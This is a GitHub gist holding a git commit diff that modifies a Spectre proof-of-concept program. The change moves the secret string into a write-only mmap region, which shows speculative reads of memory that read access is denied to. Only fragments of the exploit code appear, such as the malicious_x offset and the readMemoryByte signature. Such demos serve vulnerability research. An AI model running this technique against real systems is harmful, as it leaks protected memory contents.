Created
February 25, 2018 20:18
-
-
Save anonymous/f90e7b91c847e7a0339105fffd1cdffd to your computer and use it in GitHub Desktop.
stdin
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
commit 1bc56614b1f9e63cb5509f43032b157f450e0f57 (HEAD -> ljr) | |
Author: Luke Dashjr <luke-jr+git@utopios.org> | |
Date: Sun Feb 25 20:00:43 2018 +0000 | |
Actually deny read access to victim | |
diff --git a/Makefile b/Makefile | |
index ae71d3f..9c63da3 100644 | |
--- a/Makefile | |
+++ b/Makefile | |
@@ -1,4 +1,4 @@ | |
-CFLAGS = -std=c99 | |
+CFLAGS = -std=gnu99 | |
PROGRAM = spectre.out | |
SOURCE = Source.c | |
diff --git a/Source.c b/Source.c | |
index 1526c49..6d7e90a 100644 | |
--- a/Source.c | |
+++ b/Source.c | |
@@ -1,6 +1,7 @@ | |
#include <stdio.h> | |
#include <stdint.h> | |
#include <string.h> | |
+#include <sys/mman.h> | |
#ifdef _MSC_VER | |
#include <intrin.h> /* for rdtscp and clflush */ | |
#pragma optimize("gt", on) | |
@@ -22,7 +23,7 @@ uint8_t array1[160] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16}; | |
uint8_t unused2[64]; | |
uint8_t array2[256 * 512]; | |
-char* secret = "The Magic Words are Squeamish Ossifrage."; | |
+const char* secret = "The Magic Words are Squeamish Ossifrage."; | |
uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */ | |
@@ -114,9 +115,13 @@ void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) | |
int main(int argc, const char* * argv) | |
{ | |
- printf("Putting '%s' in memory, address %p\n", secret, (void *)(secret)); | |
- size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */ | |
- int score[2], len = strlen(secret); | |
+ int len = strlen(secret); | |
+ char * const victim = mmap(NULL, len + 1, PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); | |
+ strcpy(victim, secret); | |
+ | |
+ printf("Putting '%s' in memory, address %p\n", secret, (void *)(victim)); | |
+ size_t malicious_x = (size_t)(victim - (char *)array1); /* default for malicious_x */ | |
+ int score[2]; | |
uint8_t value[2]; | |
for (size_t i = 0; i < sizeof(array2); i++) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment